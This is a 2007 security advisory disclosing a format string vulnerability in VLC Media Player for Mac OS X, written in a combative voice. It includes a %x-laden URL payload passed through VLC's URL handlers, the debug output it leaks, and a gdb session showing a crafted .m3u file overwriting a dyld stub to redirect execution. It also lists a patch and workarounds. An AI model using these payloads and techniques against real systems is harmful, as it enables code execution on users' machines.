DMA[2007-0102a] - 'VLC Media Player Format String Vulnerability' Author: Kevin Finisterre Vendor(s): http://www.videolan.org/vlc/ Product: 'VLC media player for Mac OS X' References: http://www.digitalmunition.com/DMA[2007-0102a].txt http://projects.info-pull.com/moab/MOAB-02-01-2007.html http://sapheal.cybersecurity.pl/funny/FifaWorldCup.txt (also found the bug) Preface: To all the folks out there like this chap... http://www.unsanity.org/archives/mac_os_x/the_month_of_trolly_trolls_and.php let me take a moment to first comment on a few things... 1. Odd, this "exploit" doesn't even crash VLC for me. - I called it an Apple bug for a reason... maybe thats why its not crashing your Win32 VLC player! 2. Other people say they can crash VLC (and just crash) - Read the advisory numnuts... what was not clear about "The exploit will need some adjustment" 3. VLC isn't made by Apple and has nothing to do with Apple other than it runs on Mac OS X. - Ding Ding Ding... you get a red star (kinda)! Check item 3 in the MOAB F.A.Q. it is self explainatory 4. Only one of the 23 people I've talked to actually got this QuickTime streaming exploit to speak anything. - Um... how many of those idiots were running on PowerPC macs? How many read the advisory in its entirety? 5. Number one is usually quite difficult and it's what makes this example a crapshoot. - Bzzzzzzt wrong. What makes it a crapshot is the memory allocations... which if you READ can be worked with. 6. Remember, just because something crashes, does not mean it is exploitable. - And remember just because a random blogger claims something is not exploitable... does not mean its not. Challenge these idiots to show you WHY they are NOT exploitable. The main reason this application was picked for MOAB was because of the following press release and hoopla surrounding the new OSX support of .wmv files within VLC media player. http://www.powerpage.org/2006/12/vlc_086_released_becomes_universal_binary.html Description: VideoLAN is a software project, which produces free software for video, released under the GNU General Public License. The main product is the cross-platform VLC media player. The VLC media player is a highly portable multimedia player for various audio and video formats (MPEG1, MPEG2, MPEG4, DivX, mp3, ogg, ...) as well as DVDs, VCDs, and various streaming protocols. It can also be used as a server to stream in unicast or multicast in IPv4 or IPv6 on a high-bandwidth network. Debug message strings can be used to trigger an exploitable format string condition on the OSX version of VLC Media Player. These strings can be passed onto the VLC Media Player via URL handlers that are installed during the program installation. main debug: CPU has capabilities 486 586 MMX MMXEXT SSE SSE2 FPU ... main debug: using interface module "macosx" main debug: thread 42050048 (manage) created at priority -47 (interface/interface.c:164) main debug: adding playlist item `%x.%x.%x.%x.%x.%x' ( udp://%x.%x.%x.%x.%x.%x ) main debug: creating new input thread ... access_udp error: cannot open socket vcdx warning: Can't get file status for 0.0.0.158996fb.158f89e0.29a3400: No such file or directory vcdx warning: could not retrieve file info for `0.0.0.158996fb.158f89e0.29a3400': No such file or directory vcdx warning: can't open nrg image file 0.0.0.158996fb.158f89e0.29a3400 for reading On the x86 platform an attacker can overwrite dyld_stubs in order to influence to execution flow of VLC media player. kevin-finisterres-computer:~/Desktop kf$ ./VLCMediaSlayer-x86.pl jump address is: 0x589eaea4 writing to file: pwnage.m3u kevin-finisterres-computer:~/Desktop kf$ gdb -q /Applications/VLC.app/Contents/MacOS/VLC 2035 Reading symbols for shared libraries ..................... done /Users/kf/Desktop/2035: No such file or directory. Attaching to program: `/Applications/VLC.app/Contents/MacOS/VLC', process 2035. Reading symbols for shared libraries .....+..............................................................+++ ..... done 0x90009857 in mach_msg_trap () (gdb) open pwnage.m3u Filename 'pwnage.m3u' not found in this program's debug information. (gdb) shell open pwnage.m3u (gdb) c Continuing. Reading symbols for shared libraries .... done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: KERN_PROTECTION_FAILURE at address: 0x000003ff [Switching to process 2035 thread 0x67cb] 0xa0011393 in dyld_stub___vfprintf () (gdb) x/x 0xa0011393 0xa0011393 : 0x589eaea4 Workaround: Check out http://developers.videolan.org/vlc/ and install the latest CVS version once a patch has been developed. The current fix is here http://trac.videolan.org/vlc/changeset/18481 Disable the URL handlers for vlc media player. Landon may also have something for you in a day or so. Seriously this guy is cool as shit for doing this. http://landonf.bikemonkey.org/code/macosx/MOAB_Day_1.20070102060815.15950.zadder.local.html